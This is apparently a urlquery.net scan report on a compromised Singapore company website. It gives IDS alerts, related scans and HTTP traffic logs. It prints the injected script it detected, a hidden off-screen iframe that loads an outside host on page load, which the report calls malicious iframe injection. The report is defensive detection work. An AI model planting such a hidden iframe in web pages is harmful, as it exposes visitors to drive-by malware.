urlquery.net - Free url scanner

Overview

URL	http://europlast.com.sg/
IP	203.76.172.87
ASN	AS45470 8 to Infinity Pte Ltd
Location	Singapore
Report completed	2012-10-23 10:51:55 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-10-23 10:51:21	203.76.172.87	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)

Snort /w Sourcefire VRT

No alerts detected

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 203.76.172.87

Date	Alerts / IDS	URL	IP
2013-02-11 14:55:57	2 / 4	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-02-10 13:54:34	2 / 4	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-02-05 18:07:17	2 / 3	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-01-18 09:26:36	0 / 1	http://achieveglobal.com.tw	203.76.172.87
2013-01-15 15:31:52	0 / 0	http://www.mugigae.com/staging	203.76.172.87
2013-01-03 15:56:59	0 / 0	http://www.bluetangerine.biz	203.76.172.87

Last 6 reports on ASN: AS45470 8 to Infinity Pte Ltd

Date	Alerts / IDS	URL	IP
2013-02-12 05:04:19	0 / 2	http://8toinfinity.com/?xclzve_Raku4DMWfpz8HRaku3DXgqz8HQZir0	223.25.232.20
2013-02-11 14:55:57	2 / 4	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-02-10 14:36:54	1 / 2	http://www.akcmedical.com.sg/aboutus.html	223.25.232.217
2013-02-10 13:54:34	2 / 4	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-02-05 18:07:17	2 / 3	http://www.ajsmanpower.com/Location.php	203.76.172.87
2013-02-03 06:13:55	1 / 3	http://www.daqcon.com.sg/products.htm	223.25.232.217

Last 6 reports on domain: europlast.com.sg

Date	Alerts / IDS	URL	IP
2012-10-20 20:32:20	1 / 1	http://europlast.com.sg/	203.76.172.87
2012-10-19 20:34:17	1 / 1	http://europlast.com.sg/	203.76.172.87
2012-10-19 02:17:25	1 / 1	http://europlast.com.sg/	203.76.172.87
2012-10-18 03:30:05	1 / 1	http://europlast.com.sg/	203.76.172.87
2012-10-16 03:23:28	1 / 1	http://europlast.com.sg/	203.76.172.87
2012-10-13 07:47:38	1 / 2	http://europlast.com.sg/	203.76.172.87

JavaScript

Executed Scripts (3)

#2 JavaScript::Script (size: 276, repeated: 1) - Alert detect on script (Severity: 2)

  function frmAdd() {
      var ifrm = document.createElement('iframe');
      ifrm.style.position = 'absolute';
      ifrm.style.top = '-999em';
      ifrm.style.left = '-999em';
      ifrm.src = "http://fenwaywest.com/media/index.php";
      ifrm.id = 'frmId';
      document.body.appendChild(ifrm);
  };
  window.onload = frmAdd;

Executed Evals (0)

Executed Writes (1)

#1 JavaScript::Write (size: 218, repeated: 1)

<embed width="900" height="427" src="flash/europlast.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" > </embed>

HTTP Transactions (16)

Request	Response
GET / HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 3433 Content-Location: http://europlast.com.sg/index.html Last-Modified: Mon, 08 Oct 2012 17:33:15 GMT Accept-Ranges: bytes Etag: "c035c5ff7aa5cd1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:16 GMT
GET /css/reset.css HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/	HTTP/1.1 200 OK Content-Type: text/css Content-Length: 1068 Last-Modified: Wed, 27 Jul 2011 11:41:55 GMT Accept-Ranges: bytes Etag: "6c7dbb2f524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /images/logo.ico HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: image/x-icon Content-Length: 3415 Last-Modified: Wed, 27 Jul 2011 11:41:57 GMT Accept-Ranges: bytes Etag: "56d4b530524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /css/main.css HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/	HTTP/1.1 200 OK Content-Type: text/css Content-Length: 3151 Last-Modified: Wed, 27 Jul 2011 11:41:54 GMT Accept-Ranges: bytes Etag: "9284202f524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /Scripts/AC_RunActiveContent.js HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/	HTTP/1.1 200 OK Content-Type: application/x-javascript Content-Length: 9100 Last-Modified: Mon, 08 Oct 2012 17:34:19 GMT Accept-Ranges: bytes Etag: "d474c9257ba5cd1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:17 GMT
GET /images/bg.jpg HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/css/main.css	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Length: 577 Last-Modified: Wed, 27 Jul 2011 11:41:53 GMT Accept-Ranges: bytes Etag: "aa647e2e524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/menu_bot.png HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/css/main.css	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 4798 Last-Modified: Wed, 27 Jul 2011 11:42:06 GMT Accept-Ranges: bytes Etag: "bc75d36524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/menu.png HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/css/main.css	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 5789 Last-Modified: Wed, 27 Jul 2011 11:42:08 GMT Accept-Ranges: bytes Etag: "960f836524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/logo.jpg HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/css/main.css	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Length: 33183 Last-Modified: Wed, 27 Jul 2011 11:42:08 GMT Accept-Ranges: bytes Etag: "e4724b37524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /images/index.jpg HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/css/main.css	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Length: 112692 Last-Modified: Wed, 27 Jul 2011 11:41:58 GMT Accept-Ranges: bytes Etag: "5a426631524ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:18 GMT
GET /flash/europlast.swf HTTP/1.1 Host: europlast.com.sg User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Content-Length: 347103 Last-Modified: Wed, 27 Jul 2011 11:51:56 GMT Accept-Ranges: bytes Etag: "28ad9095534ccc1:325ad" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 23 Oct 2012 08:51:19 GMT
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT Etag: "289dff-26c-4cb2ceb2654c0" Accept-Ranges: bytes Content-Length: 620 Date: Tue, 23 Oct 2012 08:51:26 GMT Connection: keep-alive
GET /media/index.php HTTP/1.1 Host: fenwaywest.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 23 Oct 2012 08:51:27 GMT Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4 X-Powered-By: PHP/5.2.17 Set-Cookie: advid=76445; expires=Wed, 24-Oct-2012 08:51:27 GMT Location: http://google.com Content-Length: 0 Connection: close
GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/ Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://www.google.com/ Date: Tue, 23 Oct 2012 08:51:28 GMT Expires: Thu, 22 Nov 2012 08:51:28 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 219 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/ Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK	HTTP/1.1 302 Found Content-Type: text/html; charset=UTF-8 Location: http://www.google.no/ Cache-Control: private Set-Cookie: NID=64=NFlDdOa6kZJJy45vCu__cy2O3-rJMNCoPpuVHo0Up1iQ2wvOC796gUqEzh3BS4mLiu8YK7VKc55sQHplenGW8XfSqcLgXgMmIoD0yGMNUVRYPsNz_gAzaVYbWoE8pKh2; expires=Wed, 24-Apr-2013 08:51:28 GMT; path=/; domain=.google.com; HttpOnly P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info." Date: Tue, 23 Oct 2012 08:51:28 GMT Server: gws Content-Length: 218 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1 Host: www.google.no User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://europlast.com.sg/ Cookie: PREF=ID=833f642268853dd7:U=b8513c9986712345:FF=0:TM=1350344350:LM=1350344355:S=LPv_BMBUAC2Sq6lO; NID=64=wjqq-34sbw8_xZ_YRV2WYW7fIZaBTx0lz0gBHcLIwqanxYn4oQAq91WrZ2VCsF5Rw54OTpvDvPxDz0V1G-U8l77CmHDtBoxYEO7q4xasLAaD13EdvlmdnYljh62qP_E8	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Tue, 23 Oct 2012 08:51:28 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Encoding: gzip Server: gws Content-Length: 27525 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN